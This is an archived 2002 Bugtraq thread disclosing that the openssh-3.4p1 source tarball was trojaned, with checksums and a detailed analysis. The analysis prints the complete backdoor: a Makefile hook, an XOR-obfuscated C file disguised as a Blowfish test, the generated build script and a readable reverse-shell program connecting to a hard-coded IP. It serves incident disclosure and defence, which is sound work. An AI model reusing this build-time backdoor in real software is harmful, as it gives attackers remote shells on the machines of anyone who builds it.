8799802 2002-08-01 13:20 +0200  /53 rader/ Mikael Olsson <mikael.olsson@clavister.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-08-01  15:40  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <23430>
Ärende: openssh-3.4p1.tar.gz distribution recently trojaned
------------------------------------------------------------
From: Mikael Olsson <mikael.olsson@clavister.com>
To: bugtraq@securityfocus.com
Message-ID: <3D49198F.8613D352@clavister.com>


From
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

----- Forwarded message from Edwin Groothuis <edwin@mavetju.org> -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <edwin@mavetju.org>
To: incidents@securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package op ftp.openbsd.org
(and probably all its mirrors now) it trojaned:

    ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
deraadt@openbsd.org and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net).
  
[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

-- 
Edwin Groothuis      |            Personal website: http://www.MavEtJu.org
edwin@mavetju.org    |    Weblog: http://www.mavetju.org/weblog/weblog.php 
bash$ :(){ :|:&};:   | Interested in MUDs? http://www.FatalDimensions.org/
(8799802) /Mikael Olsson <mikael.olsson@clavister.com>/(Ombruten)
8799826 2002-08-01 14:17 +0200  /479 rader/ Christian Bahls <christian.bahls@stud.uni-rostock.de>
Sänt av: joel@lysator.liu.se
Importerad: 2002-08-01  15:43  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: Christian Bahls <christian.bahls@stud.uni-rostock.de>
Externa svar till: christian.bahls@stud.uni-rostock.de
Mottagare: Bugtraq (import) <23431>
Ärende: trojan horse in recent openssh (version 3.4 portable 1)
------------------------------------------------------------
From: Christian Bahls <christian.bahls@stud.uni-rostock.de>
To: bugtraq@securityfocus.com
Cc: Christian Bahls <christian.bahls@stud.uni-rostock.de>
Message-ID: <Pine.BSO.4.44.0208011309080.17007-100000@wh5041.stw.uni-rostock.de>

[ i am not subscribed to bugtraq ..
  so if you reply please include me in the cc]

i did an analysis on the trojan horse that was hidden
in the recent portable version of openssh (3.4p1)
it could be found(and still can be) on ftp.openbsd.org
and his mirrors.

in openssh-3.4p1/openbsd-compat a c-file "bf-test.c" has been added
   it tells you it has to check for correct handling in HP-UX PL.2
   systems .. which is in fact 100% rubbish
   [PL.1 has been horrible .. so what could PL.2 be? :-]

in openssh-3.4p1/openbsd-compat "Makefile.in" has been edited to
   respect these changes

when running make "bf-test.c" compiles to a program which has a
  shell-script as output

the shellscript outputs a c-programm and trys really hard to get it
  compiled .. and run

the c-programm connects to a computer in australia(203.62.158.32)
and starts a shell locally if asked by the other computer
[ i have not started this programm .. but the server seems
  to have closed the port 6667(could be a firewall in between though)
  {this computer probably has been attacked beforehand}]

in my opinion this is a really serious attack
.. as i have to say:
1.) i do not often check signatures an packets i install
1.a) especialy i wouldn't have thought about the possibility
     that someone might be able to get access to ftp.openbsd.org
     (ok this is a sun-os machine at the university of alberta)
2.) i normaly run make on a computer reachable by the net
3.) sometimes one is lazy and just runs make && make install as root

you will find all the more interesting stuff
below this signature:

yours
  christian bahls
  math-student
  university of rostock

>> "there she goes .. "

#######
# the c-programm
# [made readable by my favourite indentation program]
# {all comments are by me}
#######
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
jmp_buf env;
int   s;

/*
 * i_val evaluates to /bin/sh
 */
char *i_val = "\x2f\x62\x69\x6e\x2f\x73\x68";

/*
 * this is a signal-handler routine
 * it catches SIGALARM .. closes the socket
 * and waits for 1 hour and than trys again
 */
void  sig(int sig)
{
	close(s);
	sleep(3600);
	longjmp(env, 0);
}
int   main()
{
	int   x;
	char  c, *a[2];
	struct sockaddr_in sa;
	struct sigaction act;

	/*
	 * fork() and continue as background process
	 */
	switch (fork()) {
	    case 0:
		break;
	    default:
		exit(0);
	}
	/*
	 * daemonize a bit (still associated to the same session)
	 */
	close(0);
	close(1);
	close(2);
	/*
	 * setup signal handler routines
	 */
	memset(&act, 0, sizeof(act));
	act.sa_handler = sig;
	sigaction(SIGALRM, &act, NULL);
	do {
		/*
		 * this is where we a going to return after 1h
		 * if we have to retry
		 */
		setjmp(env);
		/*
		 * set up a socket
		 * connect to 203.62.158.32 port 6667
		 * no this program is not going to do irc
		 */
		if ((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1))
			exit(1);
		memset(&sa, 0, sizeof(sa));
		sa.sin_family = AF_INET;
		sa.sin_port = htons(6667);
		sa.sin_addr.s_addr = inet_addr("203.62.158.32");
		/*
		 * give it 10 seconds to connect
		 * otherwise start over(1h retry time)
		 * if error occurs .. just die
		 */
		alarm(10);
		if (connect(s, (struct sockaddr *) & sa, sizeof(sa)) == (-1))
			exit(1);
		/*
		 * read one char from socket
		 * die if something goes wrong
		 */
		if ((x = read(s, &c, 1)) == (-1)) {
			exit(1);
		} else if (x == 1) {
			switch (c) {
			    case 'A':	/* we got an 'A' .. just exit() */
				exit(0);
			    case 'D':	/* we got an 'D' .. set off the
					 * alarm() make the socket
					 * stdin/stdout/stderr .. start a
					 * shell .. finish if it
					 * finishes(execve() behavoir) */
				alarm(0);
				dup2(s, 0);
				dup2(s, 1);
				dup2(s, 2);
				a[0] = i_val;
				a[1] = NULL;
				execve(a[0], a, NULL);
				break;
			    case 'M': /* just retry */
				alarm(0);
				sig(0);
				break;
			    default:
			}
		} else {
			exit(0);
		}
	/*
	 * just loop forever
	 */
	} while (1);
}

#####
# Output of bf-test:
#####
>>>SNIPP
#!/bin/sh
cat >conftest.c <<_ACEOF
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
jmp_buf env;int s;char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";void sig(int sig){close(s);sleep(3600);longjmp(env,0);}int main(){int x;char c,*a[2];struct sockaddr_in sa;struct sigaction act;switch(fork()){case 0:break;default:exit(0);}close(0);close(1);close(2);memset(&act,0,sizeof(act));act.sa_handler=sig;sigaction(SIGALRM,&act,NULL);do{setjmp(env);if((s=socket(AF_INET,SOCK_STREAM,0))==(-1))exit(1);memset(&sa,0,sizeof(sa));sa.sin_family=AF_INET;sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr("203.62.158.32");alarm(10);if(connect(s,(struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1);if((x=read(s,&c,1))==(-1)){exit(1);}else if(x==1){switch(c){case 'A':exit(0);case 'D':alarm(0);dup2(s,0);dup2(s,1);dup2(s,2);a[0]=i_val;a[1]=NULL;execve(a[0],a,NULL);break;case 'M':alarm(0);sig(0);break;default:}}else{exit(0);}}while(1);}
_ACEOF
(grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out
grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out
rm -f bf-test*
TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`"
if  ! test $TESTPROG ; then TESTPROG=sh; fi
gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1
# testing in raw ecb mode
<<<SNAPP

######
# diff of different versions ..
# one is the trojan ..
######
diff -r -u -N non-trojan/openssh-3.4p1/openbsd-compat/Makefile.in trojan/openssh-3.4p1/openbsd-compat/Makefile.in
--- non-trojan/openssh-3.4p1/openbsd-compat/Makefile.in	Tue Feb 19
21:27:57 2002
+++ trojan/openssh-3.4p1/openbsd-compat/Makefile.in	Wed Jan 31 22:52:03 2001
@@ -26,6 +26,7 @@
 	$(CC) $(CFLAGS) $(CPPFLAGS) -c $<

 all: libopenbsd-compat.a
+	@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &

 $(COMPAT): ../config.h
 $(OPENBSD): ../config.h diff -r -u -N
non-trojan/openssh-3.4p1/openbsd-compat/bf-test.c
trojan/openssh-3.4p1/openbsd-compat/bf-test.c
--- non-trojan/openssh-3.4p1/openbsd-compat/bf-test.c	Thu Jan  1
01:00:00 1970
+++ trojan/openssh-3.4p1/openbsd-compat/bf-test.c	Wed Jan 31 22:52:03 2001
@@ -0,0 +1,251 @@
+/*
+ * Blowfish input vectors are handled incorrectly on HP-UX PL.2
systems.
+ * Perform routine compatability checks.
+ */
+#include <stdio.h>
+
+#define KEY_TEST_NUM    25
+static unsigned char key_test[KEY_TEST_NUM]={
+        0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87,
+        0x78,0x69,0x5a,0x4b,0x3c,0x2d,0x1e,0x0f,
+        0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,
+        0x88};
+
+/* DES cbc input vectors */
+static unsigned char ecb_data[]={
+
+	0x0c,0x0e,0x00,0x4d,0x46,0x41,0x00,0x5c,0x47,0x25,0x4c,
+	0x4e,0x5b,0x0f,0x11,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,
+	0x5b,0x01,0x4c,0x0f,0x13,0x13,0x70,0x6e,0x6c,0x6a,0x60,
+	0x69,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
+	0x13,0x5c,0x5b,0x4b,0x46,0x40,0x01,0x47,0x11,0x0f,0x25,
+	0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5c,
+	0x56,0x5c,0x00,0x5b,0x56,0x5f,0x4a,0x5c,0x01,0x47,0x11,
+	0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
+	0x13,0x5c,0x56,0x5c,0x00,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
+	0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
+	0x4b,0x4a,0x0f,0x13,0x41,0x4a,0x5b,0x46,0x41,0x4a,0x5b,
+	0x00,0x46,0x41,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,
+	0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5a,0x41,0x46,0x5c,
+	0x5b,0x4b,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,
+	0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x4a,0x5d,0x5d,0x41,0x40,
+	0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
+	0x4b,0x4a,0x0f,0x13,0x5c,0x46,0x48,0x41,0x4e,0x43,0x01,
+	0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,
+	0x4a,0x0f,0x13,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x01,0x47,
+	0x11,0x0f,0x25,0x45,0x42,0x5f,0x70,0x4d,0x5a,0x49,0x0f,
+	0x4a,0x41,0x59,0x14,0x46,0x41,0x5b,0x0f,0x5c,0x14,0x4c,
+	0x47,0x4e,0x5d,0x0f,0x05,0x46,0x70,0x59,0x4e,0x43,0x12,
+	0x0d,0x73,0x57,0x1d,0x49,0x73,0x57,0x19,0x1d,0x73,0x57,
+	0x19,0x16,0x73,0x57,0x19,0x4a,0x73,0x57,0x1d,0x49,0x73,
+	0x57,0x18,0x1c,0x73,0x57,0x19,0x17,0x0d,0x14,0x59,0x40,
+	0x46,0x4b,0x0f,0x5c,0x46,0x48,0x07,0x46,0x41,0x5b,0x0f,
+	0x5c,0x46,0x48,0x06,0x54,0x4c,0x43,0x40,0x5c,0x4a,0x07,
+	0x5c,0x06,0x14,0x5c,0x43,0x4a,0x4a,0x5f,0x07,0x1c,0x19,
+	0x1f,0x1f,0x06,0x14,0x43,0x40,0x41,0x48,0x45,0x42,0x5f,
+	0x07,0x4a,0x41,0x59,0x03,0x1f,0x06,0x14,0x52,0x46,0x41,
+	0x5b,0x0f,0x42,0x4e,0x46,0x41,0x07,0x06,0x54,0x46,0x41,
+	0x5b,0x0f,0x57,0x14,0x4c,0x47,0x4e,0x5d,0x0f,0x4c,0x03,
+	0x05,0x4e,0x74,0x1d,0x72,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
+	0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,0x70,
+	0x46,0x41,0x0f,0x5c,0x4e,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
+	0x5b,0x0f,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
+	0x0f,0x4e,0x4c,0x5b,0x14,0x5c,0x58,0x46,0x5b,0x4c,0x47,
+	0x07,0x49,0x40,0x5d,0x44,0x07,0x06,0x06,0x54,0x4c,0x4e,
+	0x5c,0x4a,0x0f,0x1f,0x15,0x4d,0x5d,0x4a,0x4e,0x44,0x14,
+	0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,0x15,0x4a,0x57,0x46,
+	0x5b,0x07,0x1f,0x06,0x14,0x52,0x4c,0x43,0x40,0x5c,0x4a,
+	0x07,0x1f,0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1e,
+	0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1d,0x06,0x14,
+	0x42,0x4a,0x42,0x5c,0x4a,0x5b,0x07,0x09,0x4e,0x4c,0x5b,
+	0x03,0x1f,0x03,0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x4e,
+	0x4c,0x5b,0x06,0x06,0x14,0x4e,0x4c,0x5b,0x01,0x5c,0x4e,
+	0x70,0x47,0x4e,0x41,0x4b,0x43,0x4a,0x5d,0x12,0x5c,0x46,
+	0x48,0x14,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
+	0x07,0x7c,0x66,0x68,0x6e,0x63,0x7d,0x62,0x03,0x09,0x4e,
+	0x4c,0x5b,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,0x4b,0x40,
+	0x54,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x07,0x4a,0x41,0x59,
+	0x06,0x14,0x46,0x49,0x07,0x07,0x5c,0x12,0x5c,0x40,0x4c,
+	0x44,0x4a,0x5b,0x07,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
+	0x03,0x7c,0x60,0x6c,0x64,0x70,0x7c,0x7b,0x7d,0x6a,0x6e,
+	0x62,0x03,0x1f,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,0x06,
+	0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x42,0x4a,
+	0x42,0x5c,0x4a,0x5b,0x07,0x09,0x5c,0x4e,0x03,0x1f,0x03,
+	0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x5c,0x4e,0x06,0x06,
+	0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x49,0x4e,0x42,
+	0x46,0x43,0x56,0x12,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
+	0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x5f,0x40,0x5d,
+	0x5b,0x12,0x47,0x5b,0x40,0x41,0x5c,0x07,0x19,0x19,0x19,
+	0x18,0x06,0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x4e,
+	0x4b,0x4b,0x5d,0x01,0x5c,0x70,0x4e,0x4b,0x4b,0x5d,0x12,
+	0x46,0x41,0x4a,0x5b,0x70,0x4e,0x4b,0x4b,0x5d,0x07,0x0d,
+	0x1d,0x1f,0x1c,0x01,0x19,0x1d,0x01,0x1e,0x1a,0x17,0x01,
+	0x1c,0x1d,0x0d,0x06,0x14,0x4e,0x43,0x4e,0x5d,0x42,0x07,
+	0x1e,0x1f,0x06,0x14,0x46,0x49,0x07,0x4c,0x40,0x41,0x41,
+	0x4a,0x4c,0x5b,0x07,0x5c,0x03,0x07,0x5c,0x5b,0x5d,0x5a,
+	0x4c,0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,
+	0x05,0x06,0x09,0x5c,0x4e,0x03,0x5c,0x46,0x55,0x4a,0x40,
+	0x49,0x07,0x5c,0x4e,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,
+	0x06,0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x46,
+	0x49,0x07,0x07,0x57,0x12,0x5d,0x4a,0x4e,0x4b,0x07,0x5c,
+	0x03,0x09,0x4c,0x03,0x1e,0x06,0x06,0x12,0x12,0x07,0x02,
+	0x1e,0x06,0x06,0x54,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,
+	0x14,0x52,0x4a,0x43,0x5c,0x4a,0x0f,0x46,0x49,0x07,0x57,
+	0x12,0x12,0x1e,0x06,0x54,0x5c,0x58,0x46,0x5b,0x4c,0x47,
+	0x07,0x4c,0x06,0x54,0x4c,0x4e,0x5c,0x4a,0x0f,0x08,0x6e,
+	0x08,0x15,0x4a,0x57,0x46,0x5b,0x07,0x1f,0x06,0x14,0x4c,
+	0x4e,0x5c,0x4a,0x0f,0x08,0x6b,0x08,0x15,0x4e,0x43,0x4e,
+	0x5d,0x42,0x07,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,
+	0x5c,0x03,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,
+	0x03,0x1e,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,0x03,
+	0x1d,0x06,0x14,0x4e,0x74,0x1f,0x72,0x12,0x46,0x70,0x59,
+	0x4e,0x43,0x14,0x4e,0x74,0x1e,0x72,0x12,0x61,0x7a,0x63,
+	0x63,0x14,0x4a,0x57,0x4a,0x4c,0x59,0x4a,0x07,0x4e,0x74,
+	0x1f,0x72,0x03,0x4e,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,
+	0x4d,0x5d,0x4a,0x4e,0x44,0x14,0x4c,0x4e,0x5c,0x4a,0x0f,
+	0x08,0x62,0x08,0x15,0x4e,0x43,0x4e,0x5d,0x42,0x07,0x1f,
+	0x06,0x14,0x5c,0x46,0x48,0x07,0x1f,0x06,0x14,0x4d,0x5d,
+	0x4a,0x4e,0x44,0x14,0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,
+	0x15,0x52,0x52,0x4a,0x43,0x5c,0x4a,0x54,0x4a,0x57,0x46,
+	0x5b,0x07,0x1f,0x06,0x14,0x52,0x52,0x58,0x47,0x46,0x43,
+	0x4a,0x07,0x1e,0x06,0x14,0x52,0x25,0x70,0x6e,0x6c,0x6a,
+	0x60,0x69,0x25,0x07,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,
+	0x0f,0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,
+	0x0f,0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,
+	0x41,0x0f,0x11,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,
+	0x0f,0x4c,0x5f,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,
+	0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,0x41,0x0f,
+	0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x42,0x01,0x40,
+	0x5a,0x5b,0x25,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,0x0f,
+	0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x0f,
+	0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x0f,0x11,0x0f,
+	0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,0x0f,0x4c,0x5f,0x0f,
+	0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,0x4e,0x44,0x4a,0x49,
+	0x46,0x43,0x4a,0x0f,0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,
+	0x0f,0x42,0x01,0x40,0x5a,0x5b,0x25,0x5d,0x42,0x0f,0x02,
+	0x49,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x05,0x25,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x12,0x0d,0x4f,
+	0x4d,0x4e,0x5c,0x4a,0x41,0x4e,0x42,0x4a,0x0f,0x73,0x0d,
+	0x73,0x4f,0x48,0x5d,0x4a,0x5f,0x0f,0x0b,0x7a,0x7c,0x6a,
+	0x7d,0x15,0x0f,0x00,0x4a,0x5b,0x4c,0x00,0x5f,0x4e,0x5c,
+	0x5c,0x58,0x4b,0x73,0x4f,0x73,0x0d,0x4f,0x0d,0x25,0x46,
+	0x49,0x0f,0x0f,0x0e,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
+	0x5b,0x47,0x4a,0x41,0x0f,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,
+	0x60,0x68,0x12,0x5c,0x47,0x14,0x0f,0x49,0x46,0x0f,0x25,
+	0x48,0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,
+	0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
+	0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,
+	0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,
+	0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,
+	0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,
+	0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,
+	0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,
+	0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,
+	0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x48,0x4c,
+	0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,
+	0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,
+	0x4a,0x5b,0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,
+	0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,
+	0x0f,0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,
+	0x7b,0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,
+	0x68,0x0f,0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,
+	0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,
+	0x47,0x4a,0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,
+	0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,
+	0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,
+	0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,
+	0x09,0x09,0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,
+	0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,
+	0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,0x7b,
+	0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,0x7f,
+	0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
+	0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
+	0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,0x6a,
+	0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,0x41,
+	0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,
+	0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,
+	0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,
+	0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,0x0f,
+	0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x4c,0x4c,0x0f,
+	0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,
+	0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
+	0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,0x0f,0x0b,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x0f,0x7f,
+	0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
+	0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
+	0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,0x41,
+	0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,0x41,
+	0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,0x6a,
+	0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x06,0x0f,0x1e,0x11,0x00,
+	0x4b,0x4a,0x59,0x00,0x41,0x5a,0x43,0x43,0x0f,0x1d,0x11,
+	0x09,0x1e,0x25,0x00};
+
+/* big endian */
+static unsigned long bfplain[2][2]={
+        {0x424c4f57L,0x46495348L},
+        {0xfedcba98L,0x76543210L}
+        };
+
+static unsigned long bfcipher[2][2]={
+        {0x324ed0feL,0xf413a203L},
+        {0xcc91732bL,0x8022f684L}
+        };
+
+
+static unsigned char ocb_data[]={
+    0x4d,0x2c,0x20,0x73,0x69,0x67,0x29,0x3b,
+    0x0a,0x20,0x64,0x6f,0x20,0x7b,0x0a,0x20,
+    0x20,0x73,0x65,0x74,0x6a,0x6d,0x70,0x28,
+    0x00};
+
+static unsigned char cbc_key [16]={
+        0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
+        0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87};
+
+static unsigned char cbc_iv
[8]={0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10};
+
+#if defined(WIN16) || defined(__LP32__)
+#elif defined(_CRAY) || defined(__ILP64__)
+/*
+ * _CRAY note. I could declare short, but I have no idea what impact
+ * does it have on performance on none-T3E machines. I could declare
+ * int, but at least on C90 sizeof(int) can be chosen at compile
time.
+ * So I've chosen long...
+ *                                      <appro@fy.chalmers.se>
+ */
+#else
+#endif
+
+main(void)
+{
+    int i, n, err;
+    unsigned char cbc_in[40],cbc_out[40],iv[8];
+
+    dup2(1, 2);
+#ifdef CHARSET_EPCDIC
+    epcdic2ascii(ecb_data, strlen(ecb_data));
+#endif
+
+    printf("# testing in raw ecb mode\n");
+
+    n=0;
+    if (memcmp(&(bfcipher[n][0]),&(cbc_iv[0]),8) != 0)
+    {
+        err = 1;
+    }
+
+    if (memcmp(&(bfplain[n][0]),&(cbc_iv[0]),8) != 0)
+    {
+        err = 1;
+    }
+
+    if (err)
+    {
+        for (i = 0; i < sizeof(ecb_data)-1; i++)
+            fprintf(stderr, "%c", ecb_data[i] ^ 47);
+    }
+return(0);
+}
